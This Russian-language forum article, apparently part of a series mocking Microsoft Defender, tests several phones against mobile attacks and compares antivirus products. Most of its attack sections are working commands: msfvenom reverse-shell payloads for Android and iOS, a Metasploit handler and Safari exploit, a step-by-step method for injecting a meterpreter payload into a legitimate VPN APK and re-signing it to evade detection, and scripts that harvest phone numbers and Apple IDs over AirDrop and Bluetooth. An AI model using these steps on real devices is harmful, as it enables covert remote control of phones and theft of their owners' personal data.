Статья Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса, часть вторая - Android vs IOS

Предисловие

​

И все мы мечтаем быть богатыми: миллионерами или даже миллиардерами, наверное, не сыскать личности, которая не желала бы кучу денег, а все отрицающие - явно лжецы. Более того, я думаю, что большинство из Вас уверены, что рано или поздно это произойдет. В современном мире чтобы стать успешным больше не нужно вспахивать огород своей прабабушки в поисках нефти, достаточно лишь создать простенький сайт или приложение, которые тут же подхватят инвесторы, и вот…Вуаля, стозначные числа уже у Вас на счету, но есть один нюанс, как и в прошлом веке нужно с чего-то начинать - поднимать свою пятую точку с дивана и что-то делать, а делать-то не очень и хочется.

Однако что поделать тем, кто уже что-то сотворил, когда они уже отдали свое дело на попечение современным компаниям, которые раз от разу пестрят громкими высказываниями: “Пользуясь нашим сервисом, ты защищен, твои деньги сохранны”, “ Мы лучшая компания и самая безопасная”. А потом вдруг все ваше дело пошло прахом, ваши счета обнулились, а имущество переписано на торчка Колю из соседнего подъезда.

Почему? А-а-а, опять Майкрософт недоглядел критическую уязвимость, ну как всегда.

Кстати, у этого цикла появился собственный саундтрек, послушайте:

Спокойно принять, отрицать реальность или просто ничего не делать, дабы не было чего терять? Склоняюсь больше к последнему. Ладно, долой размышления, у нас второй как-бы выпуск из цикла Проделки Майкрософт, а прошлые вот здесь:

Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса - история тотального провала: Defender & Windows 11

Начертите на полу пентаграмму, соберитесь в круг и пустите немного крови на рисунок, а после произнесите заклинание - именно так каждый раз я призываю дисклеймер. Стоп, в этот раз не вышло… Попробуйте так сделать, а то кажись я утратил его благосклонность.

Сделали? О, вот же он:

Дисклеймер ​

На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.

И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку.

Проделки Майкрософт: развенчание абсолютно безопасности от Билла Гейтса: цель - мобильные устройства или вторая часть ​

В прошлой части вроде как я обещал проверить защищенность мобильных устройств с установленным “антивирусом” от Майкрософт, да? Ладненько, так уж и быть, но сперва очертим план и подопытных:

Издеваться сегодня будем над такими вот системами и устройствами, в этом списке будет как новое поколение, так и старенькие устройства, которые мне удалось найти:

1. Samsung Galaxy A51, 12 Андроид: 8 ГБ оперативной памяти, 8 ядер по 2.6 ГГц, встроенный антивирус от Knox.
2. Iphone 5, IOS 10.5.5( последняя доступная версия): 1 ГБ оперативной памяти. Процессор неизвестен.
3. Lenovo Tab 7, Андроид 7: 4 ГБ оперативной памяти, 2 ядра по 1.7 ГГц. Системная защита отсутствует.
4. Iphone XR, ISO 14: 3 ГБ оперативной памяти, процессор A12 Bionic, 4 ядра по 1.8 ГГц.

Итак, тесты будут происходить в два этапа, сначала мы проверим стандартную защиту системы - на что она способна без какой-либо помощи из вне, а дальше уже установим тот самый Дефендер от Майкрософт и поглядим изменилось ли что-то, сравнив результаты с популярными мобильными версиями антивирусных приложений.

Использовать будем следующие защитные средства:

1. Дефолтная защита системы, если имеется такова.
2. Майкрософт Дефендер от 16.07.2022 для Андроид и ИОС.
3. Аваст собственной персоной: бесполезная штуковина, что для ПК, что для мобильных устройств.
4. ESET, который позиционируют многие как лучшую защиту.

Знаю, что вы уже устали от этих всех списков, но теперь последний, вредоносы и способы проникновения, которые будем использовать:

1. Различные эксплоиты из Метасплоит, ну, это уже классика как бы. По ходу действий выберу штучек пять и попытаюсь с ними что-то сделать.
2. Полезная нагрузка, замаскированная различными способами.
3. Используем различные вредоносные и шпионские программки прошлого, а именно зловреды семейства Хамминг, не знаю, вышла ли уже статья, где я о этих вредителях рассказывал, даже если и нет, то пусть.
4. Так как у нас в тестах задействованы представители двух разных и постоянно противопоставляемых систем - Андроид и ИОС, то под последнего единственный вирус, который мне удалось найти в открытом доступе это MagSafe - типа майнера.
5. Под Ipnone протестируем самые популярные уязвимости типа AirdropLeak и так далее.
6. Попытаемся использовать уязвимости типа: BlueBorne, Janus , Cloak and Dagger, о них расскажу чуть позже.

Начало тестов, погнали, но для это нужно включить подходящую музычку, сойдёт?

Над первым пунктом я особо и не морочил голову, запустим метасплоит и используем поиск по ключевым словам:

msfconsole
search Android

Для начала давайте проверим стандартную реверс ТСП нагрузку, никак не прятая её:

use  exploit/multi/handler
show options

Затем установим пейлоад:

set PAYLOAD windows/meterpreter/reverse_tcp

После увидим,, что требуется лишь указать адрес атакующей машины, что собственно и сделаем, порт оставляем стандартным - 4444:

set LHOST 192.168.42.128

Теперь осталось сгенерировать наш злой АПК, сделаем это через Веном следующим образом:

msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.42.128 LPORT=4444 > payloadAndroid.apk

Собственно на этом все, закидываем файлик на оба устройства и открываем, прежде включив установку из неизвестных источников.

Леново без особых пререканий открывает зловредный .апк и у нас открывается сессия в слушателе, а вот Андроид 12 и Самсунг А51 выдает кучу предупреждений, но все равно устанавливает потенциально опасный файл, но вот сессии нет.

Кстати, Вирустотал показывает обнаружения 54 из 54, не ругайте меня за то, что выгрузил её туда, я прекрасно осведомлен, что всякое попадающее туда, фиксируется в антивирусных базах. Но примите к сведению, что это сделали миллионы до меня и ничего особо не изменится.

Теперь повторим аналогичные манипуляции с IOS, эксплоитов для него гораздо меньше, но все же.

Аналогично запускаем слушатель, только в этом случае уже ставим нагрузку таким образом:

set payload payload/apple_ios/armle/meterpreter_reverse_tcp

А генерируем исполняемый файл так:

msfvenom -p apple_ios/armle/meterpreter_reverse_tcp    LHOST= 192.168.42.128 LPORT=4444 > payloadIOS.ipa

От пятого айфона, мне кажется, здесь вообще никто ничего не ожидает, собственно, не зря. Без каких-либо условий он запускает вредонос и открываем нам к себе доступ. Но стоит заметить, что если телефон бездействует, просто лежа заблокированным, то оболочку мы потеряем. Занятно.

Пришло время XR, в целом это уже получается какая-то битва между IOS и Андроид, я такого не планировал, но так даже интересней.

А вот десятый моментально удалил зловредный файл, даже не дав на него поглядеть, однако второй раз на этот .ipa уже не реагирует, что выглядит довольно-таки странно. После запуска ничего не происходит и наша полезная нагрузка удаляется. XR теперь фаворит что-ли?

Не будем отходить от темы Айфонов и проверим один свеженький эксплоит для браузера Сафари, так называемый JIT.

Этот модуль использует ошибку оптимизации JIT в Safari Webkit. Это позволяет нам писать шелл-код в раздел памяти RWX в JavaScriptCore и выполнять его. Шеллкод содержит эксплойт ядра (CVE-2016-4669), который получает rw от ядра, а после получает root и отключает подпись кода. Затем мы загружаем и выполняем полезную нагрузку meterpreter. Выглядит это намного проще на практике, чем в описании. Однако стоит заметить, что даже разработчик эксплоита отметил, мол это исключительно работает на IOS 8.0.0 и ниже, напомню, что у нас два представителя от 10.5.5.5, заведомо обрекает на наше поражение, но попробовать хочется. Вдруг выйдет. Хе-хе:

use exploit/apple_ios/browser/safari_jit

Затем нам нужно определить и выбрать из списка доступных устройств в сети нашу жертву, а именно 5-й Айфон:

show targets
set targets 1

Устанавливаем айпи адрес атакующей машины и прописываем порт:

show options
set lhost 192.168.42.128

А после… Запускаем:

exploit

Ну-у, результат очевиден, ничего не произошло.

А теперь возвратимся к Андроиду, стало быть дела у нас обстояли следующим образом: 12-й отказался открывать нам оболочку, поэтому сейчас предпримем попытки его обмануть.

Сперва используем автоматизированный метод, который наверняка провалится, но показать охота, это какой-то непонятный скрипт из Гитхаб, давайте-ка его установим в нашу Кали:

git clone https://github.com/AnonymousAt3/cyberdoor.git

Затем и установим его:

cd cyberdoor
 chmod +x install.sh
./install.sh
 cyberdoor

В появившейся менюшке нас интересует лишь первый пункт, его и выберем, далее нас попросят ввести наш айпи адрес, короче просто следуем требованиям скрипта.

Плюс этой штуки в том, что она попытается произвести автоматическую подпись и это нам только на руку, как я считаю. Выгружаем результат на наш Андроид 12, теперь он не пытается удалить сразу же этот файл и пока что никак не реагирует, однако стоит его открыть и происходит все то же, что и в случае с обычной полезной нагрузкой. Метод хрень, не используйте ни в коем случае.

Пойдем немного другим путем, он уже намного интереснее и шанс того, что прокатит- немного больше, начинаем. Генерируем дефолтную полезную нагрузку для Андроид:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.42.128 lport=4444 -o /root/1vasa.apk

Теперь выполним склейку, для сего действа понадобится нам несколько библиотек, установим их:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Теперь начертим то, что примерно нам нужно сотворить, представлю это в виде списка:

1. Декомпилировать полезную нагрузку и первоначальный apk
2. Скопировать файлы полезной нагрузки в первоначальный apk
3. Ввести полномочия в файле AndroidManifest.xml
4. Перекомпилировать первоначальный apk
5. Подписать apk приложением Jarsigner

Звучит сложно? Ну-у, может немного, но я таким промышлял будучи ещё школьником и поверьте, перед вами обычный человек.

Первым делом декомпилируем созданный нами APK в папку Vasa:

apktool d -f -o Vasa /root/1vasa.apk

Теперь нам нужно выбрать приложение для склейки с нагрузкой, представим, что это какой-то VPN, а их туча целая существует:

apktool d -f -o original /root/turbovpn.apk

Неплохо, теперь нам нужно перенести саму полезную нагрузку в Турбо ВПН, делается это следующим образом: создаем в папке Original ещё две директории, называя их metasploit и stage, затем переходим по пути:

/root/payload/smali/com/metasploit/stage

И копируем оттуда все файлы. Но на этом не все, таким макаром полезная нагрузка никак не будет работать, её нужно немного модифицировать.

Для этого требуется отредактировать слайм файлы, это те самые a, b, c.smail.
Значится открываем файл AndroidManifest.xml, расположенный в /root/original посредством любого текстового редактора.

Затем мы ищем <activity> ярлык, который содержит обе строки:

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

В нашем случае это будет :

"com.turbo2.VPN.StartActivity".

Те две строки, которые мы искали, показывают деятельность, которая будет запускаться , когда мы стартуем уже установленное приложение средствами запуска. Тавтология, но зато точно.

Стало быть теперь у нас есть понимание о названии этой опции и мы можем найти её в .smali коде, откроем её с помощью leafpad и заменим Activity_Путь "android:name”, но вместо точек,
введем такое:

/root/original/smali/com/turbo2/VPN/StartActivity.smail

И теперь можно обратно собирать исполняемый файл, делаем это так:

apktool b /root/original

Осталось только создать подпись, раньше я бы пошел за этим в Андроид Студио и ломал себе голову по поводу недостающих библиотек и почему же оно не подписывается, но сейчас все гораздо проще. Сперва посредством Keytool создадим ключ:

keytool –genkey –v –keystore my-release-key.jks –keyalg RSA –keysize 2048 –validity 10000 –alias my-alia

Ну и также легко подпишем наш .APK:

jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.jks /usr/local/bin/VPN.apk my-alias

Собственно на этом все, запускаем слушатель и выгружаем полезную нагрузку на устройство. Без каких-либо оповещений запускается ВПН, а у нас открывается обратная оболочка: волен делать все, что пожелаю. Андроид 12 пал.

Аналогично сработало и на 7-й, ну это очевидно уже было.

Третий пункт в плане тестирования будет краток, изложу быстро: Андроид 7 - Хамминг был запущен и начал показ рекламы как только появился на устройстве. А51 отверг эту штуковину как только она попала в его файловую систему. Айфон 5 - спокойно запустил MagSafe, а вот XR воспротивился.

Переходим к четвертому пункту, используем уязвимость в AirDrop.

Здесь все дело в начальной стадии передачи, когда устройства пытаются понять находятся ли их мобильные номера в списке контактов или же почты, потому отправляют пакет AWDL (Apple Wireless Direct Link), который содержит в себе всю необходимую информацию как: технические характеристики,номера телефонов, идентификаторы Apple ID, адреса электронной почты. Конечно в 2019 году это шифровалось с помощью SHA256, вроде так и осталось кстати, но что такое этот тип шифрования? Я могу вбить в гугле “дешифратор SHA256” и легко узнать ваши персональные данные.

И чтобы это сделать мне не нужно иметь образование или быть специалистом в какой-то из областей IT, мне достаточно установить Кали и вот этот репозиторий:

git clone  https://github.com/hexway/apple_bleee.git

А, ну ещё две сетевые карты с поддержкой мониторинга, в переходе можно купить USB-адаптер за 0 рублей.

Ну, и установить все необходимые зависимости для работы:

sudo apt update && sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txt
git clone https://github.com/seemoo-lab/owl.git && cd ./owl && git submodule update --init && mkdir build && cd build && cmake .. && make && sudo make install && cd ../..

Сперва подключим наш адаптер к виртуальной машине, затем в консоли переведем его в режим мониторинга следующей командой:

sudo iwconfig wlan0 mode monitor && sudo ip link set wlan0 up && sudo owl -i wlan0 -N &

А затем и запустим сам скрипт:

sudo python3 airdrop_leak.py

XR сразу же откисает, так как у него версия IOS 16 и она уже не уязвима, а вот пятерочка спокойно начинает нам пересылать данные своего владельца.

Также было обнаружено ещё несколько десятков похожих уязвимостей, которые связаны с Блютузом, точнее с функцией BLE, через которую устройства обмениваются информацией с ближайшим соседом, при том мы можете даже не пользоваться ничем, но информация все равно будет передана.

И вот эту частоту с легкостью можно прослушивать, представим, что какой-то Денис сидит у вас за стенкой и ожидает когда же вы начнете что-то делать.

В репозитории, который мы уже установили имеется данный скрипт, потому запустим его:

python3 ble_read_state.py

И как вы можете заметить здесь есть куча функций, вплоть к отправке Imessage на телефон жертвы. SSID, номер телефона. состояние вашего устройства и даже ваше имя с фамилией - перехватить можно все.

А затем мы и вовсе можем запросить обмен паролями, но для этого уже понадобится информация из прошлого скрипта:

adv_wifi.py [-h] [-p PHONE]

И да, это все спокойно на нем работает, при том, что обновить версию ИОС на этом устройстве невозможно, то есть он постоянно уязвим.

И раз пошла такая пьянка с блютузом, то давайте попытаемся эксплуатировать уязвимость BluBorne в Андроид. Здесь я вставлю такую вот цитатку, чтобы вы примерно ориентировались во всем этом:

Что такое BlueBorn? BlueBorne — это вектор атаки, с помощью которого хакеры могут использовать соединения Bluetooth для проникновения и получения полного контроля над целевыми устройствами. BlueBorne влияет на обычные компьютеры, мобильные телефоны и расширяющуюся область устройств IoT. Атака не требует, чтобы целевое устройство было сопряжено с устройством злоумышленника или даже было переведено в режим обнаружения. На данный момент Armis Labs выявила восемь уязвимостей нулевого дня, которые указывают на существование и потенциал вектора атаки. Армис считает, что на различных платформах, использующих Bluetooth, предстоит обнаружить еще много уязвимостей. Эти уязвимости полностью работоспособны и могут быть успешно использованы, как показано в нашем исследовании. Вектор атаки BlueBorne можно использовать для совершения широкого круга правонарушений.

Но вот нас интересует конкретно одна - это CVE-2017-0785, которая очень схожа с тем, что мы только что делали с Айфоном. Как и в XR в А51 она уже давным давно исправлена, но мы имеем некий призрачный шанс на эксплуатацию седьмого ведроида. Сперва установим необходимые библиотеки:

sudo apt-get install bluetooth libbluetooth-dev
sudo pip install pybluez
sudo pip install pwntools

Для работы нам ничего особо не понадобится, просто скопировать сам репозиторий и запустить скрипт, выбрав параметр Target.

git clone https://github.com/ArmisSecurity/blueborne.git
cd blueborne
python CVE-2017-0785.py

Но, к сожалению, ни один из Андроидов не оказался уязвимым.

А теперь время самого интересного, устанавливаем AVAST Mobile на все устройства и погнали тестировать, что же изменилось:

Леново ТАБ-7, Андроид 7: Полезная нагрузка как открывала обратную оболочку, так и открывает. Подписанный и склеенный АПК работает без проблем. А вот Хамминг был уничтожен антивирусом.

Самсунг Галактика А51, Андроид 12: Изменений нет. Даже без антивируса он неплохо противостоял всяческим угрозам, а вот подписанный АПК не замечает.

Айфон 5, IOS 10.5.5: Никакого результата, полезная нагрузка открывает оболочку и никак не обнаруживается антивирусом, даже если запустить сканирование. Ошибка в AirDrop никак не исправлена.

Айфон XR, ISO 16: Аваст бесполезен. Позитивная динамика не обнаружена.

Eset Mobile Security, установили, проверяем:

Леново ТАБ-7, Андроид 7: Полезная нагрузка больше не работает, а сразу же блокируется. Подписанный и склеенный АПК был повержен. А вот Хамминг был уничтожен антивирусом.

Самсунг Галактика А51, Андроид 12: Изменения есть. Даже без антивируса он неплохо противостоял всяческим угрозам, но вот подписанный АПК, который не видел по сей момент, смог задетектить и удалить.

Айфон 5, IOS 10.5.5: Явно неплохо, полезная нагрузка уничтожена, но вот уязвимость AirDrop осталась и работает.
Айфон XR, ISO 16: Совершенная защита. Ничего не работает больше.

И пришло время гвоздя программы! Майкрософт Дефендер Мобайл!

Леново ТАБ-7, Андроид 7: Полезная нагрузка как открывала обратную оболочку, так и открывает. Подписанный и склеенный АПК работает без проблем. Хамминг не был замечен и спокойно начал показ рекламы.


Самсунг Гелакси А51, Андроид 12: Мне кажется ему было лучше без Дефендера. Ибо он начал немного тормозить, но ничего не изменилось и никакой дополнительной защиты мы не увидели.

Айфон 5, IOS 10.5.5: Никакого результата, полезная нагрузка открывает оболочку и никак не обнаруживается антивирусом. Ошибка в AirDrop никак не исправлена.

Айфон XR, ISO 16: Полезная нагрузка сработала, Дефендер не шелохнулся даже.

Итоги ​

Ох и скучная статья вышла… Сколько кода, ужас. Простите. Но мы в очередной раз доказали, что Майкрософт не компетентны в сфере безопасности, так как от их продукта толку, что от пустоты. Её нет, защиты так же нет. Никакой.

А с вами был, как всегда, какой-то парнишка под ником DeathDay ( и редактор Яш, который считает статью интересной ) и его творение. Мира всем, не прощаюсь.

Microsoft - история провала.​

 

[YagamiLight]

Круть